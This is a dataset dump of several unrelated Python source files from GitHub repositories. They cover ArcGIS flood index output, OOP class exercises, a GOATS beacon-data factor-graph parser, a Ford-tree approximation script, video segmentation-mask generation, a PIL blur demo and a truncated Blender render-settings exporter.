df_FEI_values.to_excel(writer,'Sheet1')\r\n writer.save()\r\n \r\n #second copy:\r\n output_filepath=os.path.join(OutPath_results_files,output_name)\r\n writer = ExcelWriter(output_filepath)\r\n df_FEI_values.to_excel(writer,'Sheet1')\r\n writer.save()\r\n \r\n \r\n #--------------------------------------------------------------------------\r\n # Here you create a copy of the Shapefile with TSFs points\r\n \r\n output_name= r'FEI_values_' +simulationID + r'.shp'\r\n output_FEI_shp_path=os.path.join(OutPath_FEI_shps,output_name)\r\n \r\n # Set local variables\r\n in_data = TSFs_polygon_centroids_filepath\r\n out_data = output_FEI_shp_path\r\n\r\n # Execute Copy\r\n arcpy.Copy_management(in_data, out_data)\r\n \r\n # Here you delete fields fron the attribute table\r\n dropFields = [\"OBJECTID\"]\r\n \r\n # Here you add Fields to the attribute table\r\n arcpy.DeleteField_management(output_FEI_shp_path, dropFields)\r\n \r\n #--------------------------------------------------------------------------\r\n # Here you Add a new field with the FPI VALUES\r\n \r\n fieldName1 = \"FPI\"\r\n field_type1= \"FLOAT\"\r\n fieldPrecision1 = 6 # DIGITS INCLUDING DECIMAL POSITIONS\r\n field_scale1=2 # NUMBER OF DECIMAL POSITIONS\r\n fieldAlias1 = \"FPI\"\r\n \r\n arcpy.AddField_management(output_FEI_shp_path,\r\n field_name=fieldName1,\r\n field_type=field_type1,\r\n field_precision=fieldPrecision1,\r\n field_scale=field_scale1,\r\n field_alias=fieldAlias1,\r\n field_is_nullable=\"NON_NULLABLE\")\r\n \r\n\r\n # here you populate the field with the list of FPI values\r\n \r\n field_to_modify = ['FPI']\r\n Alloc_index=0\r\n with arcpy.da.UpdateCursor(output_FEI_shp_path, field_to_modify) as cursor:\r\n for row in cursor:\r\n row[0]=FPI[Alloc_index]\r\n Alloc_index=Alloc_index+1\r\n cursor.updateRow(row)\r\n \r\n #-------------------------------------------------------------------------- \r\n # Here you Add a new field with the Hazard value to the shp file\r\n \r\n fieldName2 = \"max_Haz\"\r\n field_type2= \"FLOAT\"\r\n fieldPrecision2 = 6 # DIGITS INCLUDING DECIMAL POSITIONS\r\n field_scale2=3 # NUMBER OF DECIMAL POSITIONS\r\n fieldAlias2 = \"HAZ\"\r\n \r\n arcpy.AddField_management(output_FEI_shp_path,\r\n field_name=fieldName2,\r\n field_type=field_type2,\r\n field_precision=fieldPrecision2,\r\n field_scale=field_scale2,\r\n field_alias=fieldAlias2,\r\n field_is_nullable=\"NON_NULLABLE\")\r\n \r\n\r\n # here you populate the field with the list of Hazard values\r\n \r\n field_to_modify = ['max_Haz']\r\n Alloc_index=0\r\n with arcpy.da.UpdateCursor(output_FEI_shp_path, field_to_modify) as cursor:\r\n for row in cursor:\r\n row[0]=HAZARD[Alloc_index]\r\n Alloc_index=Alloc_index+1\r\n cursor.updateRow(row)\r\n \r\n #--------------------------------------------------------------------------\r\n # Here you Add a new field with the FEI VALUES\r\n \r\n fieldName1 = \"FEI\"\r\n field_type1= \"FLOAT\"\r\n fieldPrecision1 = 6 # DIGITS INCLUDING DECIMAL POSITIONS\r\n field_scale1=2 # NUMBER OF DECIMAL POSITIONS\r\n fieldAlias1 = \"FEI\"\r\n \r\n arcpy.AddField_management(output_FEI_shp_path,\r\n field_name=fieldName1,\r\n field_type=field_type1,\r\n field_precision=fieldPrecision1,\r\n field_scale=field_scale1,\r\n field_alias=fieldAlias1,\r\n field_is_nullable=\"NON_NULLABLE\")\r\n \r\n\r\n # here you populate the field with the list of FPI values\r\n \r\n field_to_modify = ['FEI']\r\n Alloc_index=0\r\n with arcpy.da.UpdateCursor(output_FEI_shp_path, field_to_modify) as cursor:\r\n for row in cursor:\r\n row[0]=FEI[Alloc_index]\r\n Alloc_index=Alloc_index+1\r\n cursor.updateRow(row)\r\n \r\n #--------------------------------------------------------------------------\r\n \r\n #second copy of Shapefile:\r\n output_shp_path=os.path.join(OutPath_results_shps,output_name)\r\n arcpy.Copy_management(output_FEI_shp_path, output_shp_path)\r\n \r\n print('FEI calculated successfully !!')\r\n elapsed_time = (time.time() - time_before_execution) \r\n print('Execution time: ' + str(round(elapsed_time/3600)) + ' hours ' + str(round(elapsed_time/60)%60)+ ' minutes ' + str(round(elapsed_time%60))+' seconds')\r\n\r\n########### Main Loop \r\n########\r\n###\r\n#\r\n\r\n \r\n#%% ","repo_name":"gperez1404/Flood_Hazard_Tools","sub_path":"Generate_Flood_Exposure_Index_for_a_list_of_simulations.py","file_name":"Generate_Flood_Exposure_Index_for_a_list_of_simulations.py","file_ext":"py","file_size_in_byte":14976,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"16459185234","text":"class System:\n\n # class variable\n systems = []\n\n # class methods\n @classmethod\n def create(cls):\n new_system = System()\n cls.systems.append(new_system)\n return new_system\n\n @classmethod\n def mass_of_all_systems(cls):\n galactic_mass = 0\n for system in cls.systems:\n galactic_mass += system.total_mass()\n return galactic_mass\n\n # instance methods\n def __init__(self):\n # instance variables\n self.bodies = []\n\n def __str__(self):\n s = \"\"\n for body in self.bodies:\n i = self.bodies.index(body)\n if i == (len(self.bodies) - 1):\n s += \"* {}\".format(body.name)\n else:\n s += \"* {}\\n\".format(body.name)\n return s\n\n def add(self, body):\n if body in self.bodies:\n print(\"{} has already been added!\".format(body.name))\n else:\n self.bodies.append(body)\n\n def total_mass(self):\n total = 0\n for body in self.bodies:\n total += body.mass\n return total\n\n\nclass Body:\n # class method\n @classmethod\n def all(cls, system):\n bodies_found = []\n for b in system.bodies:\n if isinstance(b, cls):\n bodies_found.append(b)\n return bodies_found\n\n # instance method\n def __init__(self, name, mass):\n self.name = name\n self.mass = mass\n\n def __str__(self):\n return \"* {}\".format(self.name)\n\n\nclass Planet(Body):\n # instance method\n def __init__(self, name, mass, day, year):\n # call parent's (superclasse's) init method first\n super().__init__(name, mass)\n self.day = day\n self.year = year\n\n\nclass Star(Body):\n # instance method\n def __init__(self, name, mass, type):\n super().__init__(name, mass)\n self.type = type\n\n\nclass Moon(Body):\n # instance method\n def __init__(self, name, mass, month, planet):\n super().__init__(name, mass)\n self.month = month\n self.planet = planet\n","repo_name":"ant0nm/d15_assignment3_oop","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18716348278","text":"from attrs import field, define\nfrom os.path import expanduser, join\nimport numpy as np\nimport pandas as pd\nfrom pathlib import Path\nimport logging\nfrom py_factor_graph.variables import PoseVariable2D, LandmarkVariable2D\nfrom py_factor_graph.measurements import (\n PoseMeasurement2D,\n FGRangeMeasurement,\n)\nfrom py_factor_graph.utils.matrix_utils import (\n make_transformation_matrix_from_theta,\n make_transformation_matrix_from_rpy,\n get_relative_rot_and_trans_between_poses,\n get_theta_from_rotation_matrix,\n get_measurement_precisions_from_covariances,\n)\nfrom py_factor_graph.factor_graph import (\n FactorGraphData,\n)\n\nimport logging, coloredlogs\n\nlogger = logging.getLogger(__name__)\nfield_styles = {\n \"filename\": {\"color\": \"green\"},\n \"filename\": {\"color\": \"green\"},\n \"levelname\": {\"bold\": True, \"color\": \"black\"},\n \"name\": {\"color\": \"blue\"},\n}\ncoloredlogs.install(\n level=\"INFO\",\n fmt=\"[%(filename)s:%(lineno)d] %(name)s %(levelname)s - %(message)s\",\n field_styles=field_styles,\n)\n\n\ndef _verify_path_is_goats_csv(instance, attribute, path: Path):\n assert isinstance(path, Path), \"path must be a Path object\"\n if not path.exists():\n raise ValueError(f\"{path} does not exist\")\n if not path.is_file():\n raise ValueError(f\"{path} is not a file\")\n if not path.suffix == \".csv\":\n raise ValueError(f\"{path} is not a .csv file\")\n\n\n@define\nclass GoatsParser:\n\n data_file_path: Path = field(validator=_verify_path_is_goats_csv)\n beacon_loc_file_path: Path = field(validator=_verify_path_is_goats_csv)\n dim: int = field(validator=lambda i, a, v: v in [2, 3]) # type: ignore\n filter_ranges: bool = field()\n\n _data = field(init=False)\n _beacon_locs = field(init=False)\n pyfg = field(init=False)\n\n def __attrs_post_init__(self):\n logger.info(f\"Loading data from {self.data_file_path}\")\n logger.info(f\"Loading beacon locations from {self.beacon_loc_file_path}\")\n\n # read in the sensor data\n self._data = pd.read_csv(self.data_file_path)\n\n # Read in the beacon locations as numpy arrays\n _beacon_loc_df = pd.read_csv(self.beacon_loc_file_path, header=None)\n assert isinstance(_beacon_loc_df, pd.DataFrame)\n self._beacon_locs = [\n _beacon_loc_df.iloc[: self.dim, idx].to_numpy()\n for idx in range(len(_beacon_loc_df.columns))\n ]\n\n self._check_beacon_num_consistent()\n\n self.pyfg = FactorGraphData(dimension=self.dim)\n self._fill_factor_graph()\n\n def _check_beacon_num_consistent(self):\n \"\"\"\n Check that the number of beacons in the data matches the number of beacons in the beacon locations file\n \"\"\"\n num_beacon_locs = len(self._beacon_locs)\n data_col_names = self._data.columns\n range_cols = [\n x for x in data_col_names if x.startswith(\"ranges_\") and \"filtered\" not in x\n ]\n filtered_range_cols = [\n x for x in data_col_names if x.startswith(\"filtered_ranges_\")\n ]\n assert len(range_cols) == len(filtered_range_cols) == num_beacon_locs, (\n f\"Number of beacon info is inconsistent. \"\n f\"{len(range_cols)} vs {len(filtered_range_cols)} vs {num_beacon_locs}\"\n )\n\n def _fill_factor_graph(self):\n self._add_beacon_variables()\n self._add_pose_variables()\n self._add_odometry_measurements()\n self._add_range_measurements()\n\n def _remap_beacon_idx(self, idx) -> int:\n logger.warning(\"Beacon indices are being remapped\")\n if idx == 0:\n return 2\n elif idx == 1:\n return 3\n elif idx == 2:\n return 0\n elif idx == 3:\n return 1\n else:\n raise ValueError(f\"Invalid beacon idx {idx}\")\n\n def _add_beacon_variables(self):\n for idx, beacon_loc in enumerate(self._beacon_locs):\n ranges = self._get_ranges(idx)\n\n # if this beacon has no ranges, then we don't add it to the factor\n # graph\n num_non_nan = np.count_nonzero(~np.isnan(ranges))\n if num_non_nan < self.dim:\n logger.warning(\n f\"Beacon {idx} has only {num_non_nan} ranges, so its position \"\n \"is not uniquely defined and it is not added to the factor graph\"\n )\n continue\n\n var_name = f\"L{idx}\"\n var = LandmarkVariable2D(var_name, beacon_loc)\n self.pyfg.add_landmark_variable(var)\n\n def _add_pose_variables(self):\n for idx, pose in enumerate(zip(self.gt_positions, self.gt_rotations)):\n if not self._row_has_range_measures(idx) and idx != 0:\n logger.debug(\n f\"Pose {idx} has no range measurements, so it is not added\"\n )\n continue\n\n position, rot = pose\n var_name = f\"A{idx}\"\n var = PoseVariable2D(var_name, tuple(position), rot)\n self.pyfg.add_pose_variable(var)\n\n def _get_transformation_matrix(self, rot, trans):\n if self.dim == 2:\n assert np.isreal(rot), f\"Rot must be a number {rot}\"\n assert (\n len(trans) == 2\n ), f\"Translation is wrong dimension; should be 2 but is {len(trans)}\"\n return make_transformation_matrix_from_theta(rot, trans)\n elif self.dim == 3:\n assert (\n len(rot) == len(trans) == 3\n ), f\"Dimension mismatch: rpy = {len(rot)} and trans = {len(trans)}\"\n return make_transformation_matrix_from_rpy(rot, trans)\n else:\n raise ValueError()\n\n def _row_has_range_measures(self, row: int) -> bool:\n beacon_ranges = (self._get_ranges(idx) for idx in range(self.num_beacons))\n range_data_at_row = np.array([x[row] for x in beacon_ranges])\n return np.any(~np.isnan(range_data_at_row)).astype(bool)\n\n def _add_odometry_measurements(self):\n start_pos = self.positions[0]\n start_rot = self.rotations[0]\n curr_pose = self._get_transformation_matrix(start_rot, start_pos)\n prev_pose = self._get_transformation_matrix(start_rot, start_pos)\n base_pose_name = \"A0\"\n for idx, (position, rot) in enumerate(zip(self.positions, self.rotations)):\n\n if not self._row_has_range_measures(idx):\n continue\n\n curr_pose = self._get_transformation_matrix(rot, position)\n\n # if first pose, then we don't have an odometry measurement\n if idx == 0:\n continue\n\n relative_rot, relative_trans = get_relative_rot_and_trans_between_poses(\n prev_pose, curr_pose\n )\n to_pose_name = f\"A{idx}\"\n x, y = relative_trans\n theta = get_theta_from_rotation_matrix(relative_rot)\n # trans_cov = 0.02 ** 2\n # rot_cov = 0.005 ** 2\n trans_cov = 0.02 ** 2\n rot_cov = 0.002 ** 2\n (\n trans_precision,\n rot_precision,\n ) = get_measurement_precisions_from_covariances(trans_cov, rot_cov)\n # trans_precision = 100.\n # rot_precision = 400.\n relative_pose_measurement = PoseMeasurement2D(\n base_pose=base_pose_name,\n to_pose=to_pose_name,\n x=x,\n y=y,\n theta=theta,\n translation_precision=trans_precision,\n rotation_precision=rot_precision,\n )\n self.pyfg.add_odom_measurement(0, relative_pose_measurement)\n\n base_pose_name = to_pose_name\n prev_pose = curr_pose\n\n def _add_range_measurements(self):\n range_precision = 10.0\n range_stddev = (1.0 / range_precision) ** 0.5\n range_stddev = 0.75\n for beacon_idx in range(self.num_beacons):\n ranges = self._get_ranges(beacon_idx)\n beacon_name = f\"L{beacon_idx}\"\n for pose_idx, dist in enumerate(ranges):\n if np.isnan(dist) or np.isinf(dist) or not np.isreal(dist):\n continue\n\n if dist < 2.0 or dist > 150.0:\n pass\n # logger.info(f\"Range {dist} is out of bounds for beacon {beacon_idx}\")\n # continue\n\n pose_name = f\"A{pose_idx}\"\n association = (pose_name, beacon_name)\n range_measure = FGRangeMeasurement(association, dist, range_stddev)\n self.pyfg.add_range_measurement(range_measure)\n\n @property\n def _COLUMN_NAMES(self):\n return {\n \"x_pos\": \"insXYZ_1\",\n \"y_pos\": \"insXYZ_2\",\n \"z_pos\": \"insXYZ_3\",\n \"x_pos_gt\": \"iNav_GT_1\",\n \"y_pos_gt\": \"iNav_GT_2\",\n \"z_pos_gt\": \"iNav_GT_3\",\n \"roll\": \"insRPY_1\",\n \"pitch\": \"insRPY_2\",\n \"yaw\": \"insRPY_3\",\n \"x_vel\": \"insVel_1\",\n \"y_vel\": \"insVel_2\",\n \"z_vel\": \"insVel_3\",\n \"range_beacon_1\": \"ranges_1\",\n \"range_beacon_2\": \"ranges_2\",\n \"range_beacon_3\": \"ranges_3\",\n \"range_beacon_4\": \"ranges_4\",\n \"range_filtered_1\": \"filtered_ranges_1\",\n \"range_filtered_2\": \"filtered_ranges_2\",\n \"range_filtered_3\": \"filtered_ranges_3\",\n \"range_filtered_4\": \"filtered_ranges_4\",\n }\n\n @property\n def positions(self) -> np.ndarray:\n position_cols = [self._COLUMN_NAMES[x] for x in [\"x_pos\", \"y_pos\", \"z_pos\"]]\n position_cols = position_cols[: self.dim] # drop the last column if we are 2D\n positions = self._data[position_cols].to_numpy()\n return positions\n\n @property\n def gt_positions(self) -> np.ndarray:\n position_cols = [\n self._COLUMN_NAMES[x] for x in [\"x_pos_gt\", \"y_pos_gt\", \"z_pos_gt\"]\n ]\n position_cols = position_cols[: self.dim]\n positions = self._data[position_cols].to_numpy()\n return positions\n\n @property\n def gt_rotations(self) -> np.ndarray:\n logger.warning(\n \"GT rotations are just taken from the corrected\"\n \" INS data so are same as orientations used to derive odometry\"\n )\n return self.rotations\n\n @property\n def poses(self) -> np.ndarray:\n \"\"\"If 2D, return poses as [x,y,theta]. If 3D, return poses as\n [x,y,z,roll, pitch, yaw].\n\n Returns:\n np.array: the poses, each row is a different pose\n \"\"\"\n positions = self.positions\n rots = self.rotations\n poses = np.concatenate((positions, rots), axis=1)\n return poses\n\n @property\n def rotations(self) -> np.ndarray:\n if self.dim == 2:\n return self._data[self._COLUMN_NAMES[\"yaw\"]].to_numpy()\n elif self.dim == 3:\n return self._data[\n self._COLUMN_NAMES[\"roll\"],\n self._COLUMN_NAMES[\"pitch\"],\n self._COLUMN_NAMES[\"yaw\"],\n ].to_numpy()\n else:\n raise ValueError(f\"dim was {self.dim} but must be 2 or 3\")\n\n @property\n def velocities(self) -> np.ndarray:\n vel_cols = [self._COLUMN_NAMES[x] for x in [\"x_vel\", \"y_vel\", \"z_vel\"]]\n vel_cols = vel_cols[: self.dim] # drop the last column if we are 2D\n velocities = self._data[vel_cols].to_numpy()\n return velocities\n\n @property\n def num_beacons(self) -> int:\n return len(self._beacon_locs)\n\n def _get_ranges(self, beacon_num) -> np.ndarray:\n if self.filter_ranges:\n return self._get_filtered_range(beacon_num)\n else:\n return self._get_unfiltered_range(beacon_num)\n\n def _get_unfiltered_range(self, beacon_num) -> np.ndarray:\n return self._data[\n self._COLUMN_NAMES[\"range_beacon_{}\".format(beacon_num + 1)]\n ].to_numpy()\n\n def _get_filtered_range(self, beacon_num) -> np.ndarray:\n return self._data[\n self._COLUMN_NAMES[\"range_filtered_{}\".format(beacon_num + 1)]\n ].to_numpy()\n\n\nif __name__ == \"__main__\":\n\n def get_data_and_beacon_files(data_dir: Path):\n files_in_dir = list(data_dir.glob(\"*.csv\"))\n assert len(files_in_dir) == 2, \"There should be two .csv files in the directory\"\n beacon_loc_file = [x for x in files_in_dir if \"beacon\" in x.name.lower()][0]\n\n # the other file is the data file\n data_file = [x for x in files_in_dir if x != beacon_loc_file][0]\n return data_file, beacon_loc_file\n\n goats_dirs = [14, 15, 16]\n for dir_num in goats_dirs:\n data_dir = Path(f\"~/data/goats/goats_{dir_num}\").expanduser()\n data_file, beacon_loc_file = get_data_and_beacon_files(data_dir)\n\n # load the factor graph from the parser\n dimension = 2\n filter_outlier_ranges = True\n parser = GoatsParser(data_file, beacon_loc_file, dimension, filter_outlier_ranges) # type: ignore\n pyfg = parser.pyfg\n\n # save the factor graph as a .pkl file\n pyfg_file_path = str(data_file).replace(\".csv\", \".pkl\")\n pyfg._save_to_pickle_format(pyfg_file_path)\n","repo_name":"hiyyg/PyFactorGraph","sub_path":"py_factor_graph/parsing/parse_goats_data.py","file_name":"parse_goats_data.py","file_ext":"py","file_size_in_byte":13252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71351916890","text":"import sys\nfrom math import sqrt\nfrom fractions import Fraction\n\n# ford tree approximation\n# https://www.bilibili.com/video/av217721014/\n#\n# most interest input, if you forget, is `fordtree.py \"(sqrt(5)-1)/2\"`\n\ndef findpath(target: Fraction):\n print(f'process {target}')\n results = []\n left = Fraction(0, 1)\n right = Fraction(1, 1)\n iteration = 0\n sqrt5 = Fraction(sqrt(5))\n while True:\n iteration += 1\n if iteration == 10000:\n print('max iteration exceed')\n break # prevent infinite loop if logic error\n middle = Fraction(left.numerator + right.numerator, left.denominator + right.denominator)\n difference = abs(target - middle)\n if difference < Fraction(1, middle.denominator * middle.denominator) / sqrt5:\n results.append(middle)\n print(f'[{iteration}] {middle}: diff {float(difference)}')\n if middle == target:\n break\n elif middle > target:\n right = middle\n else:\n left = middle\n\nif __name__ == '__main__':\n if len(sys.argv) != 2:\n print('Usage: ft.py VALUE')\n exit(1)\n findpath(Fraction(eval(sys.argv[1])))\n","repo_name":"FreskyZ/small","sub_path":"ford-tree/fordtree.py","file_name":"fordtree.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9640347456","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 19 13:24:25 2021\n\nCódigo utilizado para gerar as máscaras e as imagens a partir dos videos e marcações XML geradas pelo sensarea.\n\n@author: Gabriel\n\"\"\"\n\nimport cv2 \nimport glob\nimport os\nimport pandas as pd\nimport datetime\nimport shapely\nimport xml.etree.ElementTree as et\nfrom shapely.geometry import Polygon\n#import geopandas as gpd\nfrom shapely.ops import unary_union\nimport numpy as np\nimport cv2\n\n\n\n\ndef get_polygons(path):\n xtree = et.parse(path)\n xroot = xtree.getroot()\n \n masks = xroot.find(\"masks\")\n df = pd.DataFrame(columns=['frame', 'polygon']) \n \n for mask in masks:\n \n dic = {}\n dic['frame'] = int(mask.find('frame').text)\n pontos = mask.find('polygon').attrib.get('points')\n \n tokens = pontos.split(' ')\n poly = []\n for token in tokens[:-1]:\n ponto = token.split(',')\n poly.append((int(ponto[0]), int(ponto[1])))\n \n dic['polygon'] = poly\n df = df.append(dic, ignore_index=True)\n \n return df\n\n\n#fonte: https://www.pyimagesearch.com/2015/09/07/blur-detection-with-opencv/\ndef variance_of_laplacian(image):\n\t# compute the Laplacian of the image and then return the focus\n\t# measure, which is simply the variance of the Laplacian\n image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n return cv2.Laplacian(image, cv2.CV_64F).var()\n\npath = \"C:\\\\Users\\\\Gabriel\\\\OneDrive - Universidade de Tras-os-Montes e Alto Douro\\\\UTAD\\\\2020-2021\\\\Pesquisa\\\\Dataset\\\\Vídeos\\\\organizado\\\\dividido\"\npath_xml = \"C:\\\\Users\\\\Gabriel\\\\OneDrive - Universidade de Tras-os-Montes e Alto Douro\\\\UTAD\\\\2020-2021\\\\Pesquisa\\\\Dataset\\\\Vídeos\\\\mascaras\"\nos.chdir(path)\n\n#image_quantity=20\n\n\n\n#configuracoes de tamanho: [tamanho da imagem, tamanho do stride, percentual minimo de planta para salvar a imagem]\nconfigs = [[512, int(512/2), 0.80, 0.5], [800, int(800/3), 0.80, 0.5]]\n\n#quantidade de frames que serão \"pulados\"\nnext_frame = 30\n\n#dimensoes para salvar\ndim_salvar = 512\ntam_salvar = (dim_salvar, dim_salvar)\n\ncolumns = ['path', 'class', 'name', 'data_str', 'dia', 'mes', 'ano', 'set']\ndf=pd.DataFrame(columns=columns)\nparser = {'junho':'06',\n 'mai':'05',\n 'agosto':'08',\n 'julho':'07',\n 'set':'09',\n 'maio':'05',\n 'ago':'08'}\n\nfor root, dirs, files in os.walk(path):\n for file in files:\n if file.endswith(\".MTS\"):\n dic = {}\n dic['path'] = os.path.join(root, file)\n dic['name'] = dic['path'].split(os.path.sep)[-1]\n dic['class'] = dic['path'].split(os.path.sep)[-2]\n dic['set'] = dic['path'].split(os.path.sep)[-3]\n df=df.append(dic, ignore_index=True)\n\nprint(df.head())\n\n#verifiva se diritorio existe\npath_to_save = 'C:\\\\Users\\\\Gabriel\\\\Downloads\\\\teste_masks_crop3'\nif not os.path.exists(path_to_save):\n os.mkdir(path_to_save)\n\n\nfor i, row in df.iterrows():\n \n for folder in ['image', 'mask']:\n #verificar se diretorio para salvar imagem existe: diretorio/conjunto/classe\n if not os.path.exists(os.path.join(path_to_save, row['set'], folder)):\n #os.mkdir(os.path.join(path_to_save, folder, row['set']))\n os.makedirs(os.path.join(path_to_save, row['set'], folder), exist_ok=True)\n \n #if not os.path.exists(os.path.join(path_to_save, folder, row['set'],row['class'])):\n #os.mkdir(os.path.join(path_to_save, folder, row['set'], row['class']))\n #os.makedirs(os.path.join(path_to_save, folder, row['set'], row['class']), exist_ok=True)\n \n #le video\n cap = cv2.VideoCapture(row['path'])\n \n #captura quantidade de frames do video\n length = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n \n #define path e le arquivo de poligonos\n path_polygon = os.path.join(path_xml, row['class'], row['name'].split('.')[0]+'.xml')\n \n #verifica se o arquivo existe\n df_polygon = None\n if os.path.isfile(path_polygon):\n df_polygon = get_polygons(os.path.join(path_xml, row['class'], row['name'].split('.')[0]+'.xml'))\n n_frame = 0\n continua = True\n print('Video: ', row['path'])\n while(continua):\n #cap.set(cv2.CAP_PROP_POS_FRAMES, (step*i)-1)\n res, frame = cap.read()\n \n if res:\n try:\n #captura altura e largura do frame\n altura_imagem, largura_imagem = frame.shape[:2]\n \n #como o indice e igual ao numero do frame pode-se usar a busca direta no dataframe para se obter o poligono\n #e entao gerar uma representacao com a biblioteca shapely\n frame_polygon = None\n #verifica se arquivo existe\n if not df_polygon is None:\n frame_polygon = Polygon(df_polygon.iloc[n_frame]['polygon']).buffer(0)\n \n #transformar multipoligono num poligono so\n if frame_polygon.geom_type == 'MultiPolygon': \n \n frame_polygon =unary_union(list(frame_polygon))\n if frame_polygon.geom_type == 'MultiPolygon':\n \n polys = list(frame_polygon)\n area = 0\n index = None\n \n for i, pl in enumerate(polys):\n if pl.area > area:\n area = pl.area\n index = i\n \n frame_polygon = polys[index]\n \n \n \n #mask = np.zeros((altura_imagem, largura_imagem))\n mask = np.full((altura_imagem, largura_imagem), 0, dtype=np.uint8)\n \n \n \n coords = np.array([[x[0], x[1]] for x in list(frame_polygon.exterior.coords)], dtype=np.int32)\n \n coords = coords.reshape((-1,1,2))\n \n mask = cv2.fillPoly(mask,[coords], 1)\n \n #itera sobre as configuracoes de recorte\n for c, config in enumerate(configs):\n #definicao de tamanho de recorte para os quadrados\n image_size_side = config[0]\n #para definir o overlaping entre as imagens, nesse caso sem overlaping\n stride = config[1]\n \n #percentual minimo de planta necessario no poligono para salvar \n percentual_maximo = config[2]\n percentual_minimo = config[3]\n altura = 0\n #itera sobre a altura da imagem\n k = 0\n \n \n while(altura+image_size_side < altura_imagem):\n \n largura = 0\n #itera sobre a largura da imagem\n while(largura+image_size_side < largura_imagem):\n #corta imagem\n crop_img = frame[altura:altura+image_size_side, largura:largura+image_size_side]\n \n #corta poligono\n crop_polygon = Polygon([(altura, largura), (altura, largura+image_size_side), (altura+image_size_side, largura+image_size_side), (altura+image_size_side, largura)])\n \n #corta mascara\n crop_mask = mask[altura:altura+image_size_side, largura:largura+image_size_side]\n \n #resize das imagens\n resized = cv2.resize(crop_img, tam_salvar, interpolation = cv2.INTER_AREA)\n resized_mask = cv2.resize(crop_mask, tam_salvar, interpolation = cv2.INTER_AREA)\n \n #se o poligono existir faz os calculos para verificar se salva os crops\n if (crop_polygon.intersects(frame_polygon)):\n area_interseccao = crop_polygon.intersection(frame_polygon).area\n area_crop_polygon = crop_polygon.area\n \n if(area_interseccao/area_crop_polygon > percentual_minimo and area_interseccao/area_crop_polygon <= percentual_maximo):\n cv2.imwrite(os.path.join(path_to_save, row['set'], 'image', row['class']+'-'+ row['name'].split('.')[0]+'-{}-{}-{}-{},{}_{},{}.jpg'.format(n_frame, c, k, largura, altura, largura+image_size_side, altura+image_size_side)), resized)\n cv2.imwrite(os.path.join(path_to_save, row['set'], 'mask', row['class']+'-'+ row['name'].split('.')[0]+'-{}-{}-{}-{},{}_{},{}.png'.format(n_frame, c, k, largura, altura, largura+image_size_side, altura+image_size_side)), resized_mask)\n # print('nome: ', os.path.join(path_to_save, row['set'], row['class'], row['name']+'-{}-{}.jpg'.format(n_frame, k)))\n # print('area interseccao: ', area_interseccao)\n # print('area crop: ', area_crop_polygon)\n # print('percentual de area: ', area_interseccao/area_crop_polygon)\n # print('blurry: ', variance_of_laplacian(crop_img))\n # print('---------------------------------\\n')\n \n \n \n #atualiza a largura com o valor do passo\n largura = largura + stride\n k = k+1\n #atualiza a altura com o valor do passo\n altura = altura+stride\n #caso o resultado nao exista significa que nao há mais frames e portanto e hora de parar\n except:\n print(\"Something else went wrong\")\n else:\n continua = False\n print('read falso')\n \n #avanca frames manualmente em 15 frames\n for i in range(next_frame):\n cap.read()\n \n #conta o avanco mais um, porque no proximo read o avanco nao e contabilizado...\n n_frame = n_frame + next_frame + 1\n \n #se avanco se estender aos últimos 10 frames ignora\n if n_frame > length-10:\n continua = False\n #print('ignorando os 10 ultimos frames para evitar perda de processamento e imagens borradas nos videos que nao foram marcados')\n #print('=======================================\\n')\n \n #libera o video\n cap.release()","repo_name":"Computational-Intelligence-Lab-UTAD/classificacao_de_castas_cnns","sub_path":"utilitarios/prepara_dataset_segmentacao.py","file_name":"prepara_dataset_segmentacao.py","file_ext":"py","file_size_in_byte":11311,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29621253021","text":"# coding:iso-8859-9 Türkçe\r\n\r\n# python -m pip install Pillow\r\n# easy_install Pillow\r\n\r\nfrom PIL import Image, ImageFilter\r\n\r\nprint (\"PIL modülünü kurma ve resmi varsayýlý göstericiyle net/bulanýk görüntülrme\")\r\ntry:\r\n orijinalResim = Image.open (\"resim/nissan.png\")\r\n orijinalResim.show()\r\n bulanýkResim = orijinalResim.filter (ImageFilter.BLUR)\r\n bulanýkResim.show()\r\n #bulanýkResim.save (\"bulanýk.png\")\r\nexcept:\r\n print (\"HATA: Bulanýk resmi saklayamýyorum!..\")\r\n","repo_name":"mnihatyavas/Python-uygulamalar","sub_path":"Brian Heinold (243) ile Python/p32206e.py","file_name":"p32206e.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36237402171","text":"import bpy\nimport json\n\n#read json\ndef read_json(filepath):\n with open(filepath, \"r\") as read_file:\n data = json.load(read_file)\n return data\n\n#create json\ndef create_json(filepath, data):\n with open(filepath, \"w\") as write_file:\n json.dump(data, write_file)\n\n#format render settings infos\ndef format_render_settings_info():\n scene=bpy.context.scene\n rd=scene.render\n im=rd.image_settings\n cy=scene.cycles\n cu=scene.cycles_curves\n \n datas = {\n \"settings\": {\n \n #render\n \"feature_set\": cy.feature_set,\n #\"device\": cy.device,\n \"shading_system\": cy.shading_system,\n \n #dimensions\n \"resolution_x\": rd.resolution_x,\n \"resolution_y\": rd.resolution_y,\n \"resolution_percentage\": rd.resolution_percentage,\n \n #output\n \"use_overwrite\": rd.use_overwrite,\n \"use_placeholder\": rd.use_placeholder,\n \"use_file_extension\": rd.use_file_extension,\n \"use_render_cache\": rd.use_render_cache,\n \"file_format\": im.file_format,\n \"color_mode\": im.color_mode,\n \"color_depth\": im.color_depth,\n \"exr_codec\": im.exr_codec,\n \"compression\": im.compression,\n \n #sampling\n \"progressive\": cy.progressive,\n \n \"use_square_samples\": cy.use_square_samples,\n \"seed\": cy.seed,\n \"use_animated_seed\": cy.use_animated_seed,\n \"sample_clamp_direct\": cy.sample_clamp_direct,\n \"sample_clamp_indirect\": cy.sample_clamp_indirect,\n \"light_sampling_threshold\": cy.light_sampling_threshold,\n \"aa_samples\": 